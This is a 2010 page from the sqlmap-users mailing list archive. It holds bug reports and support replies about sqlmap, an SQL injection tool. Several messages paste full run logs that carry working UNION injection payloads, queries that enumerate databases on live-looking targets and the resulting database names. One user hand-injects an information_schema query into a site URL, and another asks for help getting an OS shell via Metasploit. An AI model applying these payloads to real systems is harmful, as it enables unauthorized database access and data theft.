sqlmap-users Mailing List for sqlmap (Page 129)
Brought to you by: inquisb
From: Daliev I. <da...@ya...> - 2010-04-02 08:37:43
Hello SQLMAP users.

Version: sqlmap/0.8-rc7

When using partial (single row) inband SQL injection with MSSQL, sqlmap uses a construction like this:

    field1=field1_value union all select top 1 some_field from some_table where some_field not in (select top N some_field from some_table)

Microsoft says that an unordered result set with a top clause is nondeterministic. Even more, results obtained with different N are the same. Maybe it's better to use a skip/limit clause or something like this:

    field1=field1_value union all select top 1 some_field from some_table where some_field not in (select top N some_field from some_table order by 1) and some_field in (select top N+1 some_field from some_table order by 1)

Regards,
Daliev Ilya
From: Miroslav S. <mir...@gm...> - 2010-03-31 08:32:43
Hi.

You've probably come to the problem of dealing with Unicode symbols in SQL injection. Currently (in blind injection) we use a bisection algorithm with settings for ASCII coding, but we could research how to use it with Unicode too. As this is not a one-day job (we have to find some universal solution, adapt it and test it for usage on all supported DBMSes) we'll put it on a queue.

Kind regards,
Miroslav Stampar

On 29.3.2010 16:55, Smith Andy wrote:
> Hello,
> first I just want to say that your sqlmap tool is the best there is
> online for SQLi.
> however I've been facing a problem that I wasn't able to solve
> when dumping a column's contents, sometimes, the contents are in Japanese
> or Arabic ...etc (not in English)
> in which case sqlmap doesn't get the contents properly (I get
> gibberish symbols)
> even in the session file, the column contents don't get written
> correctly.
> I was hoping you can help me with this problem.
>
> Thanks a lot,
> Matt Lun.
>
> ------------------------------------------------------------------------
> Hotmail has tools for the New Busy. Search, chat and e-mail from your
> inbox. Learn More.
> <http://www.windowslive.com/campaign/thenewbusy?ocid=PID27925::T:WLMTAGL:ON:WL:en-US:WM_HMP:032010_1>
>
> ------------------------------------------------------------------------------
> Download Intel® Parallel Studio Eval
> Try the new software tools for yourself. Speed compiling, find bugs
> proactively, and fine-tune applications for parallel performance.
> See why Intel Parallel Studio got high marks during beta.
> http://p.sf.net/sfu/intel-sw-dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: Smith A. <te...@ho...> - 2010-03-29 14:55:18
Hello,

first I just want to say that your sqlmap tool is the best there is online for SQLi.

However, I've been facing a problem that I wasn't able to solve: when dumping a column's contents, sometimes the contents are in Japanese or Arabic ...etc (not in English), in which case sqlmap doesn't get the contents properly (I get gibberish symbols). Even in the session file, the column contents don't get written correctly.

I was hoping you can help me with this problem.

Thanks a lot,
Matt Lun.
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-26 20:44:46
Fixed and committed.

Thanks,
Bernardo

On Fri, Mar 26, 2010 at 19:42, David Guimaraes <sk...@gm...> wrote:
> # ./sqlmap.py ... --roles
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 16:39:53
>
> [16:39:53] [WARNING] the testable parameter 'unidade' you provided is not
> into the Cookie
> [16:39:53] [INFO] using
> '/home/skys/sqlmap-dev/output/portais.ufg.br/session' as session file
> [16:39:53] [INFO] resuming match ratio '0.848' from session file
> [16:39:53] [INFO] resuming injection point 'POST' from session file
> [16:39:53] [INFO] resuming injection parameter 'unidade' from session file
> [16:39:53] [INFO] resuming injection type 'numeric' from session file
> [16:39:53] [INFO] resuming 0 number of parenthesis from session file
> [16:39:53] [INFO] resuming back-end DBMS 'postgresql' from session file
> [16:39:53] [INFO] resuming union comment '--' from session file
> [16:39:53] [INFO] resuming union count 8 from session file
> [16:39:53] [INFO] resuming union position 2 from session file
> [16:39:53] [INFO] testing connection to the target url
> [16:39:53] [INFO] testing for parenthesis on injectable parameter
> [16:39:53] [INFO] the back-end DBMS is PostgreSQL
>
> web application technology: PHP 5.2.12, Apache 2.2.14
> back-end DBMS: PostgreSQL
>
> [16:39:53] [INFO] fetching database users privileges
> [16:39:53] [INFO] read from file 'xxx': xxx
>
> [16:39:53] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.9-dev
> Python version: 2.5.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 75, in main
>     start()
>   File "/home/skys/sqlmap-dev/lib/controller/controller.py", line 260, in
> start
>     action()
>   File "/home/skys/sqlmap-dev/lib/controller/action.py", line 106, in action
>     conf.dbmsHandler.getRoles(), "role")
>   File "/home/skys/sqlmap-dev/lib/core/dump.py", line 110, in userSettings
>     users = userSettings.keys()
> AttributeError: 'NoneType' object has no attribute 'keys'
>
> [*] shutting down at: 16:39:53
>
> --
> David Gomes Guimarães

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: David G. <sk...@gm...> - 2010-03-26 19:42:57
# ./sqlmap.py ... --roles

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 16:39:53

[16:39:53] [WARNING] the testable parameter 'unidade' you provided is not into the Cookie
[16:39:53] [INFO] using '/home/skys/sqlmap-dev/output/portais.ufg.br/session' as session file
[16:39:53] [INFO] resuming match ratio '0.848' from session file
[16:39:53] [INFO] resuming injection point 'POST' from session file
[16:39:53] [INFO] resuming injection parameter 'unidade' from session file
[16:39:53] [INFO] resuming injection type 'numeric' from session file
[16:39:53] [INFO] resuming 0 number of parenthesis from session file
[16:39:53] [INFO] resuming back-end DBMS 'postgresql' from session file
[16:39:53] [INFO] resuming union comment '--' from session file
[16:39:53] [INFO] resuming union count 8 from session file
[16:39:53] [INFO] resuming union position 2 from session file
[16:39:53] [INFO] testing connection to the target url
[16:39:53] [INFO] testing for parenthesis on injectable parameter
[16:39:53] [INFO] the back-end DBMS is PostgreSQL

web application technology: PHP 5.2.12, Apache 2.2.14
back-end DBMS: PostgreSQL

[16:39:53] [INFO] fetching database users privileges
[16:39:53] [INFO] read from file 'xxx': xxx

[16:39:53] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 75, in main
    start()
  File "/home/skys/sqlmap-dev/lib/controller/controller.py", line 260, in start
    action()
  File "/home/skys/sqlmap-dev/lib/controller/action.py", line 106, in action
    conf.dbmsHandler.getRoles(), "role")
  File "/home/skys/sqlmap-dev/lib/core/dump.py", line 110, in userSettings
    users = userSettings.keys()
AttributeError: 'NoneType' object has no attribute 'keys'

[*] shutting down at: 16:39:53

--
David Gomes Guimarães
From: Pagera <pag...@gm...> - 2010-03-26 14:32:45
hello

it didn't work. what I'm trying to do is

    sqlmap -u "http://example.com/images.php?id=10" --string="id"

the url is vulnerable cuz when i use the browser with

    http://example.com/images.php?id=10 and 1=2

I'm able to see the MySQL error, and i tried so many functions like version() and it works. i also used

    http://example.com/images.php?id=10 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables

and i got the table names, but when using sqlmap there is nothing; it acts like the url is not vulnerable. i also used --prefix="id" --postfix="1=1" and also nothing.

David Guimaraes wrote:
> Try passing --string parameter to sqlmap.
>
> --string=STRING String to match in page when the query is valid
>
> On Thu, Mar 25, 2010 at 6:18 PM, Pagera <pag...@gm...> wrote:
>
> Hello and hope fine
> thank bernardo for the DirBuster
>
> a question about Blind sql injection
> does SQLMap support this mode?
>
> i used --UNION-USE but it failed .. i have a vulnerable url
> I'm able to view all database information by manipulating the http url
> like "version() , etc
> but when I'm using SQLMap the result is that this url is not
> vulnerable!!!
>
> I'm wondering if it's cuz of not supporting Blind Mode?
>
> and thank for help
>
> --
> David Gomes Guimarães
From: Miroslav S. <mir...@gm...> - 2010-03-26 11:53:57
Hi.

As Bernardo mentioned, it's probably a connectivity fault. Nevertheless, now we've added support for this kind of error in the form of a sqlmap error message, instead of that ugly "socket timeout".

Kind regards.

On Fri, Mar 26, 2010 at 11:37 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Please provide the command line you used to launch sqlmap and possibly
> the output with -v5.
> It looks to me that you launched with -g and without Internet
> connectivity, but I might be wrong lacking of proper details.
>
> Bernardo
>
>
> On Thu, Mar 25, 2010 at 12:50, Fahad Al Shunaiber <fh...@gm...> wrote:
>> sqlmap version: 0.8
>> Python version: 2.6.2
>> Operating system: win32
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 74, in main
>>   File "lib\core\option.pyc", line 1137, in init
>>   File "lib\core\option.pyc", line 247, in __setGoogleDorking
>>   File "lib\utils\google.pyc", line 115, in search
>>   File "socket.pyc", line 327, in read
>>   File "httplib.pyc", line 537, in read
>>   File "socket.pyc", line 351, in read
>> timeout: timed out
>>
>> [*] shutting down at: 15:48:08
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-26 10:37:16
Please provide the command line you used to launch sqlmap and possibly the output with -v5.
It looks to me that you launched with -g and without Internet connectivity, but I might be wrong lacking of proper details.

Bernardo

On Thu, Mar 25, 2010 at 12:50, Fahad Al Shunaiber <fh...@gm...> wrote:
> sqlmap version: 0.8
> Python version: 2.6.2
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 74, in main
>   File "lib\core\option.pyc", line 1137, in init
>   File "lib\core\option.pyc", line 247, in __setGoogleDorking
>   File "lib\utils\google.pyc", line 115, in search
>   File "socket.pyc", line 327, in read
>   File "httplib.pyc", line 537, in read
>   File "socket.pyc", line 351, in read
> timeout: timed out
>
> [*] shutting down at: 15:48:08

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: David G. <sk...@gm...> - 2010-03-26 00:20:49
Try passing --string parameter to sqlmap.

--string=STRING String to match in page when the query is valid

On Thu, Mar 25, 2010 at 6:18 PM, Pagera <pag...@gm...> wrote:
> Hello and hope fine
> thank bernardo for the DirBuster
>
> a question about Blind sql injection
> does SQLMap support this mode?
>
> i used --UNION-USE but it failed .. i have a vulnerable url
> I'm able to view all database information by manipulating the http url
> like "version() , etc
> but when I'm using SQLMap the result is that this url is not vulnerable!!!
>
> I'm wondering if it's cuz of not supporting Blind Mode?
>
> and thank for help

--
David Gomes Guimarães
From: Pagera <pag...@gm...> - 2010-03-25 21:15:10
Hello and hope fine
thank bernardo for the DirBuster

a question about Blind sql injection
does SQLMap support this mode?

i used --UNION-USE but it failed .. i have a vulnerable url
I'm able to view all database information by manipulating the http url like "version() , etc
but when I'm using SQLMap the result is that this url is not vulnerable!!!

I'm wondering if it's cuz of not supporting Blind Mode?

and thank for help
From: Fahad Al S. <fh...@gm...> - 2010-03-25 12:50:58
sqlmap version: 0.8
Python version: 2.6.2
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 74, in main
  File "lib\core\option.pyc", line 1137, in init
  File "lib\core\option.pyc", line 247, in __setGoogleDorking
  File "lib\utils\google.pyc", line 115, in search
  File "socket.pyc", line 327, in read
  File "httplib.pyc", line 537, in read
  File "socket.pyc", line 351, in read
timeout: timed out

[*] shutting down at: 15:48:08
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-25 10:24:40
This happens when I merge back into trunk from a branch. If you svn checkout again a working copy it will solve the problem.

Bernardo

On Wed, Mar 24, 2010 at 15:07, Kasper Føns <th...@ma...> wrote:
> Hi
>
> I can't seem to update from svn anymore. It asks for a username/password
> pair now.
>
> /Kasper

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-25 10:23:49
Try DirBuster, http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

sqlmap has limited regular expressions to detect file system paths so far.

Bernardo

On Mon, Mar 22, 2010 at 12:20, Pagera <pag...@gm...> wrote:
> hello and hope u fine
>
> when I'm trying --os-shell with --msf
> after a while it gives me a message like
> please provide full path document root
> how can i know the full path ?
>
> is there any way to know the document root full path from sqlmap?
> or do i have to use another tool to get the job done?
>
> and thank for help

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Kasper F. <th...@ma...> - 2010-03-24 15:07:29
Hi

I can't seem to update from svn anymore. It asks for a username/password pair now.

/Kasper
From: Patrick W. <pa...@au...> - 2010-03-23 14:09:18
Try information disclosure stuff... like umm, manual, Nikto or .. something ;p

I suppose sqlmap could predetermine this if necessary under specific circumstances (devs!)... but we do it manually and it depends on permissions of operating systems, folders and files.

-Patrick

On Mon, Mar 22, 2010 at 11:20 PM, Pagera <pag...@gm...> wrote:
> hello and hope u fine
>
> when I'm trying --os-shell with --msf
> after a while it gives me a message like
> please provide full path document root
> how can i know the full path ?
>
> is there any way to know the document root full path from sqlmap?
> or do i have to use another tool to get the job done?
>
> and thank for help
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-22 15:38:12
Fixed and committed. Thanks for reporting David.

Bernardo

On Fri, Mar 19, 2010 at 02:22, David Guimaraes <sk...@gm...> wrote:
> When I try to run the sqlmap this way:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u
> "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021"
> -p art --string WRAPED
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:53:24
>
> [22:53:24] [DEBUG] initializing the configuration
> [22:53:24] [DEBUG] initializing the knowledge base
> [22:53:24] [DEBUG] cleaning up configuration parameters
> [22:53:24] [DEBUG] setting the HTTP timeout
> [22:53:24] [DEBUG] setting the HTTP method to GET
> [22:53:24] [DEBUG] creating HTTP requests opener object
> [22:53:24] [DEBUG] parsing XML queries file
> [22:53:24] [INFO] using
> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
> file
> [22:53:24] [INFO] testing connection to the target url
> [22:53:25] [INFO] testing if the provided string is within the target
> URL page content
> [22:53:29] [WARNING] the testable parameter 'art' you provided is not
> into the Cookie
> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0
> parenthesis
> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
> [22:53:29] [DEBUG] got HTTP error code: 500
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable
> with 0 parenthesis
> [22:53:30] [INFO] testing for parenthesis on injectable parameter
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis
> [22:53:32] [INFO] testing MySQL
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [WARNING] the back-end DMBS is not MySQL
> [22:53:32] [INFO] testing Oracle
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not Oracle
> [22:53:33] [INFO] testing PostgreSQL
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
> [22:53:33] [INFO] testing Microsoft SQL Server
> [22:53:34] [DEBUG] got HTTP error code: 500
> [22:53:34] [INFO] confirming Microsoft SQL Server
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with
> NULL bruteforcing technique
> [22:53:39] [DEBUG] got HTTP error code: 500
> [22:53:39] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [WARNING] the target url is not affected by an exploitable
> full inband sql injection vulnerability
> [22:53:47] [INFO] confirming partial (single entry) inband sql
> injection on parameter 'art' by appending a false condition after the
> parameter value
> [22:53:48] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [INFO] the target url is affected by an exploitable partial
> (single entry) inband sql injection vulnerability
> valid union:
> 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'
>
> [22:53:49] [INFO] Fetched data logged to text files under
> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 22:53:49
>
> He notes correctly UNIONSQLi and ends OK. Soon after that, I try to
> recover the database by including only the argument "--dbs" and he
> cannot recover in advance with the UNIONSQLi, for the strange reason described
> below, and goes to the BLINDSQLi. He tries to find the right table name
> without first knowing how many there really are through the use of the
> UNIONSQLi and directly tries to find out how many there are and their
> names using the BLINDSQLi.
>
> Example with resume:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u
> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021"
> -p art --string WRAPED --dbs
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:54:40
>
> [22:54:40] [DEBUG] initializing the configuration
> [22:54:40] [DEBUG] initializing the knowledge base
> [22:54:40] [DEBUG] cleaning up configuration parameters
> [22:54:40] [DEBUG] setting the HTTP timeout
> [22:54:40] [DEBUG] setting the HTTP method to GET
> [22:54:40] [DEBUG] creating HTTP requests opener object
> [22:54:40] [DEBUG] parsing XML queries file
> [22:54:40] [INFO] using
> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
> file
> [22:54:40] [INFO] resuming string match 'WRAPED' from session file
> [22:54:40] [INFO] resuming injection point 'GET' from session file
> [22:54:40] [INFO] resuming injection parameter 'art' from session file
> [22:54:40] [INFO] resuming injection type 'numeric' from session file
> [22:54:40] [INFO] resuming 0 number of parenthesis from session file
> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005'
> from session file
> [22:54:40] [INFO] resuming union comment '--' from session file
> [22:54:40] [INFO] resuming union count 6 from session file
> [22:54:40] [INFO] resuming union position 2 from session file
> [22:54:40] [INFO] testing connection to the target url
> [22:54:43] [WARNING] the testable parameter 'art' you provided is not
> into the Cookie
> [22:54:43] [INFO] testing for parenthesis on injectable parameter
> [22:54:43] [DEBUG] skipping test for MySQL
> [22:54:43] [DEBUG] skipping test for Oracle
> [22:54:43] [DEBUG] skipping test for PostgreSQL
> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [22:54:43] [INFO] fetching database names
> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL,
> CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name
> AS VARCHAR(8000)),
> CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109),
> NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796
> [22:54:44] [DEBUG] got HTTP error code: 500
> [22:54:45] [WARNING] for some reasons it was not possible to retrieve
> the query output through inband SQL injection technique, sqlmap is
> going blind
> [22:54:45] [INFO] fetching number of databases
> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name)))
> AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500
> [22:54:48] [DEBUG] got HTTP error code: 500
> .
> .
> .
> [23:12:13] [DEBUG] performed 42 queries in 16 seconds
> available databases [3]:
> [*] mXX
> [*] pXX
> [*] tXX
>
> [23:12:13] [INFO] Fetched data logged to text files under
> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 23:12:13
>
> But if I delete the session and send the sqlmap to start over with
> "--dbs" activated, it correctly retrieves how many databases and their
> names using the correct technique (UNIONSQLi).
>
> Example without resume (using --dbs first time):
> # rm -rf output/*
> # ./sqlmap.py --threads 20 -v 2 --union-use -u
> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021"
> -p art --string WRAPED --dbs
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 23:16:02
>
> [23:16:02] [DEBUG] initializing the configuration
> [23:16:02] [DEBUG] initializing the knowledge base
> [23:16:02] [DEBUG] cleaning up configuration parameters
> [23:16:02] [DEBUG] setting the HTTP timeout
> [23:16:02] [DEBUG] setting the HTTP method to GET
> [23:16:02] [DEBUG] creating HTTP requests opener object
> [23:16:02] [DEBUG] parsing XML queries file
> [23:16:02] [INFO] using
> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
> file
> [23:16:02] [INFO] testing connection to the target url
> [23:16:02] [INFO] testing if the provided string is within the target
> URL page content
> [23:16:03] [WARNING] the testable parameter 'art' you provided is not
> into the Cookie
> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0
> parenthesis
> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art'
> [23:16:04] [DEBUG] got HTTP error code: 500
> [23:16:04] [DEBUG] got HTTP error code: 500
> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art'
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable
> with 0 parenthesis
> [23:16:05] [INFO] testing for parenthesis on injectable parameter
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:05] [DEBUG] got HTTP error code: 500
> [23:16:06] [DEBUG] got HTTP error code: 500
> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis
> [23:16:06] [INFO] testing MySQL
> [23:16:06] [DEBUG] got HTTP error code: 500
> [23:16:06] [WARNING] the back-end DMBS is not MySQL
> [23:16:06] [INFO] testing Oracle
> [23:16:07] [DEBUG] got HTTP error code: 500
> [23:16:07] [WARNING] the back-end DMBS is not Oracle
> [23:16:07] [INFO] testing PostgreSQL
> [23:16:07] [DEBUG] got HTTP error code: 500
> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL
> [23:16:07] [INFO] testing Microsoft SQL Server
> [23:16:08] [DEBUG] got HTTP error code: 500
> [23:16:08] [INFO] confirming Microsoft SQL Server
> [23:16:14] [DEBUG] got HTTP error code: 500
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with
> NULL bruteforcing technique
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:15] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:16] [DEBUG] got HTTP error code: 500
> [23:16:17] [DEBUG] got HTTP error code: 500
> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art'
> [23:16:17] [DEBUG] got HTTP error code: 500
> [23:16:18] [DEBUG] got HTTP error code: 500
> [23:16:18] [DEBUG] got HTTP error code: 500
> [23:16:19] [DEBUG] got HTTP error code: 500
> [23:16:19] [DEBUG] got HTTP error code: 500
> [23:16:20] [DEBUG] got HTTP error code: 500
> [23:16:20] [WARNING] the target url is not affected by an exploitable
> full inband sql injection vulnerability
> [23:16:20] [INFO] confirming partial (single entry) inband sql
> injection on parameter 'art' by appending a false condition after the
> parameter value
> [23:16:21] [DEBUG] got HTTP error code: 500
> [23:16:22] [DEBUG] got HTTP error code: 500
> [23:16:27] [DEBUG] got HTTP error code: 500
> [23:16:27] [INFO] the target url is affected by an exploitable partial
> (single entry) inband sql injection vulnerability
> valid union:
> 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716'
>
> [23:16:27] [INFO] fetching database names
> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL,
> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name)
> AS VARCHAR(8000)),
> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
> NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578
> [23:16:28] [DEBUG] got HTTP error code: 500
> [23:16:28] [DEBUG] performed 1 queries in 0 seconds
> [23:16:28] [INFO] the SQL query provided returns 3 entries
> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL,
> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
> AS VARCHAR(8000)),
> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
> TOP 0 name FROM master..sysdatabases)-- AND 7328=7328
> [23:16:31] [DEBUG] got HTTP error code: 500
> [23:16:31] [DEBUG] performed 2 queries in 3 seconds
> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL,
> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
> AS VARCHAR(8000)),
> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
> TOP 1 name FROM master..sysdatabases)-- AND 1346=1346
> [23:16:32] [DEBUG] got HTTP error code: 500
> [23:16:32] [DEBUG] performed 3 queries in 0 seconds
> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL,
> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
> AS VARCHAR(8000)),
> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
> TOP 2 name FROM master..sysdatabases)-- AND 231=231
> [23:16:33] [DEBUG] got HTTP error code: 500
> [23:16:33] [DEBUG] performed 4 queries in 1 seconds
> available databases [3]:
> [*] mXX
> [*] pXX
> [*] tXX
>
> [23:16:33] [INFO] Fetched data logged to text files under
> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 23:16:33
>
> The same thing happens if I send sqlmap to dump the tables (--tables).
> If I do not pass --tables the first time it runs and discovers the
> vulnerability, when it runs again with the resumed file, it just goes
> right for BLINDSQLi, taking much longer to complete the task!
>
> --
> David Gomes Guimarães

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Pagera <pag...@gm...> - 2010-03-22 12:18:47
|
Hello, and I hope you're fine. When I'm trying --os-shell with --msf, after a while it gives me a message like "please provide full path document root". How can I know the full path? Is there any way to know the document root full path from sqlmap, or do I have to use another tool to get the job done? And thanks for the help. |
From: Alessandro T. <ale...@lo...> - 2010-03-19 09:13:35
|
The bug is human, missing quotes.

On 19 Mar 2010 06:31, "Brandon" <bmu...@gm...> wrote:

I am having a problem auditing the cat param. It appears it audits the param before it but totally ignores the params after it and shuts down.

C:\sqlmap8>sqlmap -u vulnsite.org/ks.php?mode=cat&cat=26 -v 1 \
-p "mode,cat"

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:25:31

[01:25:31] [INFO] using 'C:\sqlmap8\output\vulnsite.org\session' as session file
[01:25:31] [INFO] testing connection to the target url
[01:25:33] [INFO] testing if the url is stable, wait a few seconds
[01:25:39] [INFO] url is stable
[01:25:39] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[01:25:41] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[01:25:41] [INFO] testing if GET parameter 'mode' is dynamic
[01:25:48] [WARNING] GET parameter 'mode' is not dynamic

[*] shutting down at: 01:25:48

